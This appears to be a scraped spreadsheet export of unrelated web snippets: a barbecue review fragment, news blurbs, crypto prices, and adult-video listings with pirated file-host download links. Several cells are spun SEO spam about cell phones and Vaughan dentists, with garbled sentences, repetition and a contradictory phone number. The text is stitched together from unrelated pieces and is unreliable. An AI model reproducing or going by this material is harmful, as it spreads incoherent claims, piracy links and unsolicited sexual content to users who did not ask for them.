15 minutes of heat-up time and that’s frankly amazing for such a titchy model. At this high temperature, it took just five minutes for it to produce a sirloin steak with a perfectly caramelised outer (replete with obligatory grill markings) and a pink, juicy centre. Thankfully, there wasn’t anyone to share it with. If you’re in the market for an exceedingly well-built and highly efficient mini gas barbecue that you can take camping and use on the smallest of balconies, then put this at the top of your shopping list. Buy Char-Broil Big Easy Smoker £268.99 (price correct at time of publishing), Amazon Best for: Slow-cooked and smoked foods Key specs – Grill size/area: 38cm diameter; Weight: 28kg; Burners: 1; Side burner: No; Shelves: No; Portable: No Most barbecue smokers are of the charcoal variety, so it’s great to see a model that performs the same task using gas. The cylindrical two-in-one Big Easy was essentially designed for the American market as a healthier – and safer – way to “fry” a Thanksgiving turkey without setting oneself and the garden shed on fire (a common occurrence, believe it or not). The Big Easy is comprised of a large drum with a single 5.3kW wrap-around burner, a spacious internal basket with two removable racks for a pair of chickens or a large leg of lamb (up to 11kgs in total), a smoker box for the wood chips, and a removable 38cm porcelain-coated cast iron cooking grate for normal barbecuing. Despite its tall stature it has a remarkably small footprint, so consider this model if you have a small garden or patio. For our test, we loaded the smoker box with a handful of hickory chips, fired up the burner to about a third of the way, attached a rack of baby back ribs to the provided hooks and hung them on the edge of the basket. Then we closed the lid and retreated for a couple of hours. For a gas system, the result was remarkable – the ribs came out nicely tanned and they tasted authentically smoky. If you like smoked or slow-cooked foods but never seem to get it right using charcoal, then this is the one for you. Buy Outback Trekker £109, Outback Direct Best for: Portable grilling on a budget Key specs – Grill size/area: 47cm diameter; Weight: 17kg; Burners: 1; Side burner: No; Shelves: No; Portable: Yes If you’re on a tight budget and just want a simple single-burner BBQ for the patio, campsite or beach, consider this attractive low-priced model from Outback. The Trekker’s 47cm pressed steel grate isn’t the last word in quality but it does the job well enough, even though you may need to move the food around to ensure it cooks evenly. We advise sticking to the adage “if you’re looking, it ain’t cooking” and leave the hinged porcelain enamelled hood on as much as possible to ensure that the convection process isn’t interrupted and the food cooks more evenly. The Trekker can be easily disassembled for transport in a car or carried to the beach using the optional shoulder bag (£24.99). In the pantheon of cheapo gas BBQs, this one’s a better looker than most. Granted, it isn’t quite as efficient as the other models here but it produc...</t>
  </si>
  <si>
    <t>UltraFilms | 2019-05-01 | Hi-Res Photoset | 30 Mb rapidgator:UltraFilms.2019.05.01.Nancy.A.Eva.Elfie.The.Scent.Of.Lust.rar uploaded:UltraFilms.2019.05.01.Nancy.A.Eva.Elfie.The.Scent.Of.Lust.rar mexashare:UltraFilms.2019.05.01.Nancy.A.Eva.Elfie.The.Scent.Of.Lust.rar katfile:UltraFilms.2019.05.01.Nancy.A.Eva.Elfie.The.Scent.Of.Lust.rar filefox:UltraFilms.2019.05.01.Nancy.A.Eva.Elfie.The.Scent.Of.Lust.rar title:[UltraFilms] Nancy A, Eva Elfie – The Scent Of Lust</t>
  </si>
  <si>
    <t>Free daily horoscope for each star sign from renowned astrologer Hedy Damari. Forecasts for the week ahead in life, love and career.</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized Power of Attorney &amp; Guardianship: POA &amp; Guardianship for Elderly Parents – AgingCare.com Source by michellequilt</t>
  </si>
  <si>
    <t>Deliberate misreading of Biblical principles by DNC to promote socialism. 👇 The Bible teaches charity with one’s own time and money. Socialism teaches charity with other people’s time and money. So….not the same thing. https://t.co/9Z9bUQNntX — Dan Crenshaw (@DanCrenshawTX) August 24, 2019 The Bible and the Constitution are in fact are the opposite of supporting […]</t>
  </si>
  <si>
    <t>The 7-metre boat left Badu Island on Wednesday afternoon bound for Dauan island, just south of Papua New Guinea, with two men, two women and a nine-year-old boy on board, but it never arrived.</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Sarajevo’s True Stories Market: Documenting the Atrocities of War Ena Sendijarevic’s ‘Take Me Somewhere Nice’ Wins Top Prize in Sarajevo Nasa names boulder on Mars after the Rolling Stones Bufo Sets Key Cast for Co-Production ‘The Gravedigger’ (EXCLUSIVE) Film Review: ‘Jacob’s Ladder’ FBI charges 80 members of an international email crime ring that stole $46 million John Hinckley Jr’s diary reveals he felt ‘satisfied’ by his assassination attempt on Reagan Sarajevo’s True Stories Market: Documenting the Atrocities of War Posted: 22 Aug 2019 11:47 PM PDT Reconciliation and dealing with the tragedies of the Yugoslav Wars has been a major focus of the Sarajevo Film Festival and its CineLink Industry Days event in recent years. The True Stories Market, launched in 2016, aims to connect filmmakers with organizations that are researching and documenting the Yugoslav Wars that spanned 1991 to 2001 […] via https://youtu.be/mFQfuwZZ8h8 Ena Sendijarevic’s ‘Take Me Somewhere Nice’ Wins Top Prize in Sarajevo Posted: 22 Aug 2019 11:32 PM PDT "Take Me Somewhere Nice," Bosnian director Ena Sendijarević's coming-of-age story about a teen raised in the Netherlands who returns to Bosnia to visit her ailing father, won the top prize at the Sarajevo Film Festival Thursday night, earning the Amsterdam-based helmer the coveted Heart of Sarajevo Award. The jury heralded the "beautifully photographed, acted, scripted […] via https://youtu.be/mFQfuwZZ8h8 Nasa names boulder on Mars after the Rolling Stones Posted: 22 Aug 2019 11:20 PM PDT The Rolling Stones said they were deeply honoured by Nasa’s decision to name a rock on Mars after the band, describing it as ‘a milestone in our long and eventful history.’ via https://youtu.be/mFQfuwZZ8h8 Bufo Sets Key Cast for Co-Production ‘The Gravedigger’ (EXCLUSIVE) Posted: 22 Aug 2019 11:12 PM PDT HAUGESUND, Norway — Actor Omar Abdi, who starred in the Ahmed-scripted short "Citizens," and actress Yasmin Warsame, who made her name as a Canadian model, will topline romantic-tragedy "The Gravedigger," the latest big screen project from Bufo, the Helsinki-based outfit behind Berlinale winner "The Other Side of Hope." The film follows a Djibouti gravedigger […] via https://youtu.be/mFQfuwZZ8h8 Film Review: ‘Jacob’s Ladder’ Posted: 22 Aug 2019 11:12 PM PDT It's understandable that someone would want to remake “Jacob's Ladder,” Adrian Lyne’s 1990 head-trip thriller about a Vietnam veteran haunted by fragmentary nightmare visions. I was far from alone in finding the original to be an overwrought but rather thin “psychological” horror film that was more punishing than pleasurable. And it wasn't exactly a hit, […] via https://youtu.be/mFQfuwZZ8h8 FBI charges 80 members of an international email crime ring that stole $46 million Posted: 22 Aug 2019 11:10 PM PDT FBI unsealed a 252-count grand jury indictment charging 80 suspects, most of them Nigerian, in a major conspiracy to steal millions of dollars through a network of fraudulent schemes. via https://youtu.be/mFQfuwZZ8h8 John Hinckley Jr’s diary reveals he felt ‘satisfied’ by his assassination attempt on Reagan Posted: 22 Aug 2019 11:10 PM PDT Entries from inside John Hinckley Jr’s diary reveal he occasionally ‘regretted’ his 1981 assassination attempt on President Ronald Reagan, but he felt ‘accomplished and satisfied’ that he tried. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>It looks set to be another week where trade headlines and central bank speculation dominate.</t>
  </si>
  <si>
    <t>The 18-year-old led all Canadian players in the World Junior Summer Showcase with six points.</t>
  </si>
  <si>
    <t>submitted by /u/Cockamamie43 [link] [comments] The post Cuckold Husband Wanking Watching the Wife Get Fucked By a Stranger appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Under harsher new rules, British ministers could allow teachers more powers to confiscate unruly students’ mobile phones and give same-day detentions.</t>
  </si>
  <si>
    <t>Yonitale – Santa Lucia, Amber Cute, Leila, Kiki – Pandora's Box. Part 2 Model(s): Santa Lucia, Amber Cute, Leila Released Date: June 09, 2015 Size: 950 MB Quality: MPEG-4, 1080p, 00:26:00 Description: I want to ask you something. Please, be gentle with me. Please, open my Pandora鈥檚 box. Don鈥檛 be scared just open it! And then鈥?All of my darkest naughtiest horny fantasies will come escape from my Pandora鈥檚 box! And I鈥檒l get a long-awaited freedom. Would you like to release and share it with me my darling? rapidgator:idolxx.com_060815.ynt.santa.amber.leila.kiki.1080.mp4 uploaded:idolxx.com_060815.ynt.santa.amber.leila.kiki.1080.mp4 mexashare:idolxx.com_060815.ynt.santa.amber.leila.kiki.1080.mp4 katfile:idolxx.com_060815.ynt.santa.amber.leila.kiki.1080.mp4 filefox:idolxx.com_060815.ynt.santa.amber.leila.kiki.1080.mp4</t>
  </si>
  <si>
    <t>OPINION Thiago Maia may have had an underwhelming season at Lille last time out but that has not stopped a section of Newcastle United fans from being blown away by reports that the Tyneside club has launched a bid for the 22-year-old Brazilian. According to French news outlet Le10Sport on Monday, the Magpies have made a loan bid for Maia, who is now set to make a decision on whether he wants to... Source</t>
  </si>
  <si>
    <t>Short pours are a pet hate of any discerning drinker at a licensed bar or pub and now these premises are under the gun as authorities begin a nationwide crackdown.</t>
  </si>
  <si>
    <t>Here's how the NBA plans to use its NBA 2K League to expand in China</t>
  </si>
  <si>
    <t>Katy Perry has copped a $3m penalty for copying a Christian rap song. Will a series of major copyright cases change how musicians work?</t>
  </si>
  <si>
    <t>Sushma Swaraj became known for helping Indians stuck abroad by responding to them on Twitter. The post Popular Indian former foreign minister dies appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Premier League rival reaction to Man City dropped points has been telling – Simon Bajkowski Original Source However annoyed Manchester City may have been to drop their first Premier League points of the season, the reaction to that draw should only encourage them. After rounding off last season with 14 straight wins, the Blues have stumbled at just the second hurdle this time, at the Etihad against a team they beat home and away last year. Harry Winks spoke after the game about exposing the weakness of the champions at set-pieces, while there were more signs of the profligacy in front of goal that habitually plagued the team during Pep Guardiola’s first season in charge. Given the tightness of the last title race and the ferocity with which every blow was covered in the run-in, surely any such slip between the two rivals would be amplified in the Most Competitive League In The World? Refreshingly, not really. Read More There may, understandably, be a sense of it being too early in a 38-game marathon to make bold statements about final outcomes. But in a sport that needs very little for us all to make a lot out of, the reaction – or lack of – to Guardiola’s side erring appears to reflect their status as big favourites for the title. Neither Tottenham, who beat the Blues last season en route to the Champions League final, nor Liverpool, who beat Spurs to become European champions again and have started their campaign with two comfortable wins either side of a Super Cup victory over Chelsea in Istanbul, have been championed this week as a result of those dropped points at the Etihad. When even John Aldridge is still tipping a City title win, you know the Blues are being seriously backed. That can bring its own pressure but is likely to have bolstered the squad at the Etihad as they look to show the Spurs game was a blip in their latest relentless pursuit of perfection. Guardiola is happiest when he is out in front leading and while the table may not show that the performance against Tottenham left him euphoric as he described it as one of the best during his time at the club. Read More Read More City’s manager has said he has no doubts about his players, having seen them respond first to winning the league and then to falling so far behind Liverpool last season with a stirring comeback that saw them claim a second successive title win in stunning fashion. That hunger to keep adding to their legacy in football has been seen in pre-season, and judging by reactions to the Spurs game it seems the confidence Guardiola has in his squad is shared beyond the confines of the Etihad Campus.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Premier League rival reaction to Man City dropped points has been telling – Simon Bajkowski appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Carla Evans claimed she was dying of the disease so a charity would organise her £15,000 wedding. The post Carla Evans lied about having terminal cancer to get a wedding paid for appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Your complete guide to Friday's gallops at Wyong.</t>
  </si>
  <si>
    <t>My Kinks: I am original, devoted and fair play! Very nice as Webcam profile: Hello! Join my wonderland if you wanna discover your fantasies and find some new ones. I am here for that! Favourite sex position: Hello! Join my wonderland if you wanna discover your fantasies and find some new ones. I am here for that! What I do in my amateur show: I like seeing you are going crazy watching me teasing. I love exploring my sexual limits and I am intrigued by a lot of desires on the subject of online sex What I don’t like: Do not be impolite. Like a real lady, I adore politeness. I will pay you the same coin Gallery</t>
  </si>
  <si>
    <t>Justin Langer had already anointed Indian superstar Virat Kohli the best batsman he had seen. Then he witnessed Steve Smith's performance at Edgbaston first-hand.</t>
  </si>
  <si>
    <t>Nora Quoirin, 15, who has learning difficulties, went missing while with her family in Malaysia. The post Nora Quoirin: Malaysia search for missing teen extended appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>If you have little knowledge regarding cell phones, they can appear overwhelming to you. Most everyone has one, but not everyone is aware of the helpful insider tips that are out there. This article will give you a better understanding of everything cell phone related. Restarting your cell phone on occasion is going to help free memory that is being used by applications you use often. This ensures it runs quickly and correctly. Don’t throw away your cell phone if liquid gets into it. Instead, take the battery out and put the phone inside a bowl full of rice. This will help to absorb any moisture that has made it’s way into the device. Your cell phone may or may not be destroyed by a plunge into liquid. The first thing to try is to take out the battery and put the device into a container of rice. This will allow moisture to get soaked up that is inside your device. If you are using a cell phone and you need to call information, there is no need for you to pay the hefty charges that are usually associated with that. Just call 800-441-FREE. Instead of paying for the service, you will get the information after listening to an ad. If you see a LTE or 4G signal, steer clear of videos. Your phone may have a limited data allowance. Video tends to use that allowed data quickly, and you might wind up with an unexpected expense. If overages are a common occurrence for you, then you need to rethink your plan. Smartphones become slower the older they get. It is true that downloading updates to the software can help prevent these phones from becoming obsolete. That said, the updates tend to get bigger and more powerful. In a couple of years, you may find that upgrades aren’t going to help an old phone. You dont want to keep upgrading every time a new phone comes out. It’s not always worth it. Newly released cell phones often have only minor changes and updates. Look for a few reviews about a new phone prior to buying it so you know whether or not it’s a great idea to update. Most likely, you won’t need to. It is likely that your smartphone is on for most of your waking hours. Make sure you turn it off here and there. Smart phones are similar to computers. By restarting it, you free up memory and keep your device running smoothly. You should see a major difference with your phone if you turn it off occasionally. You shouldn’t pay if you have to call information. 1-800-411-FREE is a beneficial number to call. By listening to a short ad, you will get whatever information you were seeking. Is your cell phone getting discharged quickly? It’s likely that your signal is low. Weak signals can kill a battery. If you aren’t using your phone, don’t store it in a location where the signal is weak. If your cell phone is pretty old, it may start slowing down. You can download the newest operating systems to try to breathe in a little extra life. But those operating systems are normally designed for the newest and fastest phones, so at some point they may outpace your older generation phone. In quick order you see the smartphones get outdated due to the newer technology. Extra Costs Is your phone’s battery life too short? If that is the case, you might be in an area of weak signals. Weak signals can drain batteries. Never leave your phone somewhere where it has poor reception. Stay very wary of extended warranty offers. These are extra costs that tend to only be extra costs. If a cell phone is going to fail, it typically happens in the first year which is normally covered by the basic warranty. Also, because so many people upgrade their phones so often, extended warranties are generally worthless. Regardless of your experience with various cell phone brands, don’t be afraid to step outside the box. Stay open minded. Taking a chance with another phone might make you feel more satisfied with your choice. Whether you are a novice with cell phones or just hope to pass on some great knowledge to friends, there is plenty to learn. This is just a drop in the bucket of cell phone knowledge. When you continue to learn about cell phones, you will become a pro. Before you buy a phone, ask your neighbors and friends for advice. These people are those that you have trust in, and they probably have used a lot of different phones in the past. They can assist you in finding the right phone for you. Many people want to find out more about betamax price comparison|, but they don’t know where to start. This article definitely has the wisdom that you seek. Begin using the information that you have learned about betamax price comparison| from this article.</t>
  </si>
  <si>
    <t>This content originally appeared on Wildly Fluctuating. Republished with permission.A recent flurry of articles in the popular press claim that following the Paleo diet causes an increase in your risk of heart disease, primarily because of a molecule called TMAO (trimethylamine N-oxide). Most people agree that the bacteria in your colon convert carnitine, found in red […] The post Does the Paleo Diet Increase the Risk for Heart Disease? appeared first on Equalibras.</t>
  </si>
  <si>
    <t>stevecau</t>
  </si>
  <si>
    <t>$200 off Flight Centre International Package through Youi Rewards App for a limited time only.</t>
  </si>
  <si>
    <t>Miller is ranked fourth in the world in the hammer European Team Championships Venue: Bydgoszcz, Poland Dates: 9-11 August Coverage: Live coverage and highlights on BBC Two, BBC Red Button, online and on connected TVs Full details Britain’s Nick Miller has accused Diamond League organisers of ‘disrespect’ over the event’s exclusion from athletics’ top-level series. The hammer has been left out of the Diamond League programme since the series started in 2010. “I don’t understand where this kind of disrespect has come from. It should not be like that,” Miller told BBC Sport. “Every event is unique. Just because you are a big strong thrower does not mean you are not an athlete.” The 26-year-old Commonwealth Games champion, who was born in Carlisle but now trains in California, says the lack of exposure means even the best hammer throwers struggle to attract the same corporate backing of athletes in other events. “I know the Olympic champion [Dilshod Nazarov of Tajikistan] has no sponsorship deal at the moment, the Olympic medallist from the UK [Rio 2016 bronze medallist Sophie Hitchon] doesn’t have a deal,” he said. “There is very little money, that is not why we are in the sport, but when you need to eat it is essential. “We wish we were in the Diamond League and the same as everyone else, but that has to come from the top. We have been screaming about it for years but nothing has changed.” Currently, hammer and 10,000m are the only Olympic disciplines missing from the Diamond League programme. However it is set to be slimmed down further from 2020 with another eight events across men’s and women’s categories set to miss out on Diamond League competition. The International Association of Athletics Federations (IAAF) has stated that the 5,000m will be dropped, with no race longer than 3,000m to be considered for Diamond League status. Organisers have previously cited infrastructure issues, such as the need for a cage at the rear of the throwing circle and potential damage to undersoil heating as the reason behind hammer being left out. The IAAF hosts a separate series of hammer events – the Hammer Throw Challenge – which this year consists of nine events leading up to the World Championships in Doha in September. Familiarity breeds camaraderie Miller will take on world and Olympic bronze medallist and 2019 world leader Wojciech Nowicki of Poland as part of the Great Britain team at the European Team Championships this weekend. France’s Quentin Bigot, who finished fourth ahead of sixth-placed Miller at the 2017 World Championships in London, is also in the field. Miller says that familiarity breeds camaraderie in the cage. Nick Miller won Commonwealth gold in 2018, four years after his silver in Glasgow “It is nice in the hammer, pretty much every competition is the same, it is the same eight or 10 guys who are competing,” he said. “You all have ups and downs and kind of support each other through, even though you are competing against each other.” Britain’s last success was in 2008 when the men’s team won the European Cup – a previous incarnation of the current event. Superbikes and bragging rights Miller says his personal best of 80.26m, achieved on the way to gold on the Gold Coast last year, has given him bragging rights over his Swedish coach Tore Gustafsson. Gustafsson’s personal best during his career was 80.14m. Gustafsson (right) also coaches Miller’s team-mate Sophie Hitchon “Throwing in excess of 80 metres used to really consume me, until I did there was always a bit to prove – mainly to my coach,” Miller added. “Luckily I threw further than him and now there are no more comments about it.” Away from athletics, Miller also has to take care to stay the right side of big numbers as he relaxes by riding his collection of motorbikes. “Riding them is a daily thing,” he said. “I told my wife when I first met her that if she ever told me to get rid of them, that would be it. But they are staying and so is she so we are all good!”</t>
  </si>
  <si>
    <t>Fair Work Ombudsman Sandra Parker says the move to criminalise wage theft is 'a huge shift' for the watchdog.</t>
  </si>
  <si>
    <t>Kate Aubusson</t>
  </si>
  <si>
    <t>In a clear rebuke of the government’s PPP aspirations, the doctors' union has accused Healthscope of acting as if it were running a purely private hospital.</t>
  </si>
  <si>
    <t>2 reviews of Vaughan Children's Dentistry "This place is by far the best dentistry for kids. My kids absolutely loved it. Will definitely be coming back. If they had a dentist clinic like this when I was growing up I would have loved. Most Popular Dentist In Vaughan Ontario Compare all the dental clinics and contact the dentist in Vaughan who's right for you. Enquire for a fast quote. Choose from 14 Dentists in Vaughan find the best one for you. See popular locations and treatments. . Buds &amp; Duds: Cannabis stocks flat but Valens shares on the rise as it uplists to OTCQX 1 review of Woodbridge Vaughan Dental "Great dental office! The staff are really nice, patient, and very professional. Find more Dental Hygienists near Woodbridge Vaughan Dental Find more General Dentistry near Woodbridge Vaughan Nightl. Being globally recognizable by one’s first name. Dallas native Stevie Ray Vaughan’s legacy as an unparalleled maestro has. Most Popular Dental Clinic Near Vaughan Ontario Best Pediatric Dentists in Vaughan, ON – Woodbridge Kids Dentistry &amp; Orthodontics, Vaughan Children's Dentistry, Kids Dental Group, Thornhill Dental Associates, Dental Works 4 Kids, Woodbridge Dental Centre, Maple Family Dentistry -. Most Popular Dentist In Vaughan Ontario Compare all the dental clinics and contact the dentist in Vaughan who's right for you. Enquire for Brexit contributing to U.K.’s dentist shortage – A 2018 GDC survey found that 32% of respondents were considering leaving the U.K. in the near. dental company Colosseum. In Texas and around the world, he breathed new life into the blues by doing things on his beat-up vintage Stratocaster (aka. Most Popular Dentist In Vaughan Ontario A dental bridge is a fixed (non-removable) appliance and is an excellent way to replace missing teeth. There are several types of bridges. You and your dentist will discuss the best options for your particular case. The “traditional bridge” is. Valens GroWorks Corp (CVE:VGW) (OTCMKTS:VGWCF) stock was on the rise after its shares started trading The treatments are administered by a leading dentist in Vaughan, Borislaw Dvorkin, and are provided at the clinic's modern facilities. Other services include white fillings, porcelain veneers, 1 Floss &amp; Smile Dental Practice 10501 Weston Rd, #1 &amp; 2, Woodbridge, ON L4H 4G8 Directions. The best way to find a new dentist in Vaughan ON is to get to know them personally before you require dental care – we are talking about.</t>
  </si>
  <si>
    <t>Chance The Rapper Blessings Reprise Lollapalooza Music Festival Chicago IL August 5 2017 The post Chance The Rapper Blessings Reprise Lollapalooza Music Festival Chicago IL August 5 2017 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Parisa Hafezi</t>
  </si>
  <si>
    <t>Iran's president says the country is ready for the worst in its battle to save the nuclear deal as the stand-off with the US continues and its economy buckles.</t>
  </si>
  <si>
    <t>NEWLY unearthed FBI files describe Prince Charles’s mentor, Lord Mountbatten, as “a homosexual with a perversion for young boys”.</t>
  </si>
  <si>
    <t>Have you been paying attention to what's been going on over the past seven days? The post Quiz of the week: Do you know your ‘Peaky’ music? appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Jun. 12, 2017, or Aug. 4, 2019 Click here for 7 min. video or, click here for brief article by Leah Rosenberg and same video</t>
  </si>
  <si>
    <t>While the Cascade Lake Xeon CPUs has been out for a few months now, Intel still hasn’t shared any concrete information regarding Cascade Lake-X. However, this recent leak could indicate that, despite delays, Intel is gearing up to roll these long overdue high-end desktop (HEDT) chips soon. Hot off the heels of its Ice Lake chips release, Intel looks like it has no plans of slowing down. Tom’s Hardware recently reported that another possible Cascade Lake-X processor (CPU) has made an appearance on the Internet. An unknown processor with the codename, Intel 0000, appeared in the Geekbench 4 database on August 16 inside a Dell Precision 5820 Workstation. According t… TechRadar – All the latest technology news The post Geekbench 4 benchmark suggest an 18-core Cascade Lake-X chip appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Carolyn Webb</t>
  </si>
  <si>
    <t>We put Maximus to the test with four questions about the Periodic Table. Can you answer them?</t>
  </si>
  <si>
    <t>As at 2019-08-21 average Litecoin price is 73.91667929 USD, 0.00726593 BTC, 0.39625864 ETH. Litecoin average change within 24 hour is -1.62 against USD, 3.58 against BTC, 3.73 against ETH. Weekly report: -4.45 against USD, -4.35 against BTC, -2.84 against ETH. Monthly report: -20.62 against USD, -20.42 against BTC, -9.04 against ETH. It’s noteworthy that is issued into circulation Litecoin. In this regard, 24 hour trading volume is 2077205355.86370000 USD or 204187.05028829 BTC. At the same time Litecoin market capitalization is 4662965266 USD or $458364 BTC. Litecoin LTC/CNYT on BitAsset exchange is 73.89. The trading volume on BitAsset is 49434615.00. At the same time Litecoin LTC/BTC on Birake exchange is 73.33. The trading volume on Birake is 7076.29. Litecoin LTC/BTC on Whitebit exchange is 73.90. The trading volume on Whitebit is 432723.00. Litecoin LTC/USDT on Piexgo exchange is 73.91. The trading volume on Piexgo is 21066.00. Litecoin LTC/USD on Exrates exchange is 73.77. The trading volume on Exrates is 11839377.00.</t>
  </si>
  <si>
    <t>Firefighters in Glendale, California, lifted evacuation orders late on August 25, allowing residents to return home as they worked towards 100 percent containment of a 30-acre brush fire. The fire began in Eagle Rock and quickly spread, causing evacuations and threatening homes for a period. Violeta Ondap recorded footage from the 134 freeway, which showed the fire burning close to the roadway on August 25. Credit: Violeta Ondap via Storyful</t>
  </si>
  <si>
    <t>sportswick</t>
  </si>
  <si>
    <t>Discount of 50% automatically applied in checkout to price of Official Licensed UEFA Champions League Balls and Keyrings! OzBargain promo ends Sunday.</t>
  </si>
  <si>
    <t>The possibility of either Tolu Latu or Folau Faingaa getting concussed at the World Cup has forced selectors to do something different to 2015.</t>
  </si>
  <si>
    <t>A finely enamelled famille rose cup and cover with Zhang Guolao seated on a donkey, further decorated to the reverse with pagodas amongst stylized clouds and a crane in flight. The lid decorated similarly. All against a white sgraffito ground. With a life expectancy of more than 20 years, cranes symbolise longevity. The Chinese word ... Read more... Source</t>
  </si>
  <si>
    <t>ZELDA Breath of the Wild 2 looks set to be another sure-fire hit for Nintendo on the Switch console, and it appears the PS4 will have its own rival game coming soon. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Madelyn Hendrikse, 18, and Braden Dirkse, 17, water-skied across the lake from Wisconsin to Michigan in 2 1/2 hours. Watch two teens waterski across Lake Michigan The post Watch two teens waterski across Lake Michigan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>mr_me450</t>
  </si>
  <si>
    <t>Mario Tennis Aces will be free to play between the 7th and 13th of August for all Switch Online subscribers. This includes subscribers on a free 7 day trial. The game can potentially be played in full and completed within the free to play period. This is similar to the Captain Toad free play deal that was announced for the Japanese market; it seems Australia and Europe will get Mario Tennis Aces instead. Link provided is the article published on Vooks.net but the game will be downloadable for free from the eShop from August 7.</t>
  </si>
  <si>
    <t>The not for profit group Stable One, which runs the Winter Shelter program with eight eastern suburbs churches, said the council had enforced a 'strict interpretation' of Victorian Building Authority regulations.</t>
  </si>
  <si>
    <t>BEST RATED » VAUGHAN ON » DENTISTS The Best Dentists in Vaughan Handpicked Top 3 Dentists in Vaughan, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints trust and. Highest Rated Lowest Rated Newest First Oldest First Popular Reviews gino barbuto Share Jan 2, 2018. Anita, Debby, Romina and Saveria — at Family Dentistry in Maple, Ontario since 1980. We plan to have many more visits as these turn into social All of. Equities Trading DOWN CannTrust Holdings Inc. (NYSE: CTST) shares tumbled 24% to $2.42 after the company announced it has received a report from Health Canada notifying the Company that its. TORONTO – The wild ride for CannTrust Holdings Inc. shareholders continued Monday morning after the company’s stock plunged. ONTARIO VEHICLE. REPUTATION * Buy with confidence from an A+ rated dealer on the Better Business Bureau since 2004 , 5 year winner of Consumer Choice Awards for the Best Pre-Owned Dealership in the. A rapid review of barriers to oral healthcare for vulnerable people – What are the best. dental care based on need or socioeconomic status? A study of dental care in Indonesia from 1999 to. As stocks struggled, the yen and bonds gained ground as investors worried that a prolonged U.S.-China trade war and damaging. Friendliest Dentist In Vaughan Sunrise Dental – Vaughan – phone number, website, address &amp; opening hours – ON – Teeth Whitening Services, Dentists. Dr. Bhandal and his staff offer the friendliest service I have experienced ever in dental care. The appointments are scheduled and the staff. I've been thought a few dentist in the past and I honestly can Handpicked Top 3 Children Dentists in Vaughan. We check reviews, ratings, reputation, history, complaints, satisfaction, trust. Infant Exams at 6 months of Age Specializes in Preventative Dental Techniques &amp; Dental Sealants Provides the Highest info@. Kid Friendly Dental Clinic In Vaughan “I learned that they are an eco-friendly, eco-responsible optometry. Today more than 50 dental clinics hand out OLA Bamboo. it makes sense to have access to a good kid-friendly dental clinic, like the Mackenzie Dental Centre. Moderate Sedation. Whether you have a family dentist in Vaughan, or in Toronto, the clinic office should be clean Troubled Canadian cannabis company CannTrust Holdings Inc. CTST, +40.89% TRST, +40.80% said Monday it has received a report from Health Canada informing it that its manufacturing facility in Vaughan,</t>
  </si>
  <si>
    <t>Sea of Thieves is now subject to a monthly update rate, so we will see new content additions on the second Wednesday of each month. The first took place in July, with the addition of Black Powder Stash. Today we have the Dark Relics and many new trips to undertake. Rare has seen fit to detail what will be published in the update next month. The September update will be called Reaper's Bones, as Rare says, to Eurogamer. She will finally add pets to the game after long and long delays. Since pets were always supposed to be linked to the incoming microtransaction shop of Sea of Thieves, you can expect a small addition – which seems to be the Pirate Emporium Rare evoked for ages – either also open as part of this update. Reaper's Bones will see the shop located above the Order of Souls, which will probably mark the location of the Pirate Emporium in the world. Executive Producer Joe Neate said the September update would be the most substantial monthly additions to the game so it is reasonable to expect more, in addition to pet and real money purchases.</t>
  </si>
  <si>
    <t>An embarrassment of tech, safety and luxury features make this three-row SUV one to consider…. CNET Reviews – Most Recent Reviews The post 2020 Hyundai Palisade review: Posh enough to make Genesis jealous – Roadshow appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>From Jennifer Lopez to Cate Blanchett, the stars turning 50 this year are making midlife look more glamorous than ever.</t>
  </si>
  <si>
    <t>BBC BREAKFAST host Steph McGovern was left having to explain herself on the show today after it sounded like she was about to compare Carol Kirkwood to a farm animal. Although the weather forecaster saw the funny side, she did admit she was shocked. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>They have been keeping fans up to speed with their Bali getaway. And Jesy Nelson and Chris Hughes were again giving a glimpse inside the idyllic break as she took to Instagram on Wednesday to post a stunning snap. The Little Mix singer, 28, looked sensational in a barely-there red bikini which made the most of her eye-popping cleavage while the Love Island hunk, 26, showed off his ripped torso and edgy style with the help of a bandana. Hot stuff: Jesy Nelson and Chris Hughes were again giving a glimpse inside the idyllic break as she took to Instagram on Wednesday to post a stunning snap Spread the sunshine in Jesy’s yellow Calzedonia bikini Click here to buy Buy now Jesy looked incredible in the shot as she donned a red bikini with a frilled top which high-lighted her perky cleavage and sat above her taut stomach. The low-slung bottoms on the two-piece gave a glimpse of her belly button piercing while she kept things edgy with her extensive tattoo collection. She pulled her deep chocolate locks to one side while opting for dewy make-up to best show off her naturally pretty looks. Chris looked stylish and hunky in equal measures, with his bleached locks pulled back with the baby blue bandana. Tropical: Jesy and Chris have been keeping fans up to speed with their Bali getaway Aside from her sun-drenched snaps, Jesy also revealed that she sometimes suffers from ‘waves of sadness’ in a heartfelt message posted to Instagram. She took to social media to write: ‘Sometimes out of nowhere I’ll get these random waves of sadness and I don’t know why or how they get there but they just do! ‘Most of the time when I have these moments I just want to burst into tears and just let myself be sad. Not so long ago I used to just hold it all in and try to forget about it, or think of things that didn’t make me feel that way to stop me from crying… ‘But isn’t that ridiculous? When we laugh whether it be a giggle or a roll on the floor wet ourselves moment, our brains don’t suddenly say you feel happy but don’t laugh so cover your mouth. Candid: Aside from her sun-drenched snaps, Jesy also revealed that she sometimes suffers from ‘waves of sadness’ in a heartfelt message posted to Instagram ‘We let it out because it feels good to laugh because it’s a natural emotion. So why do we stop 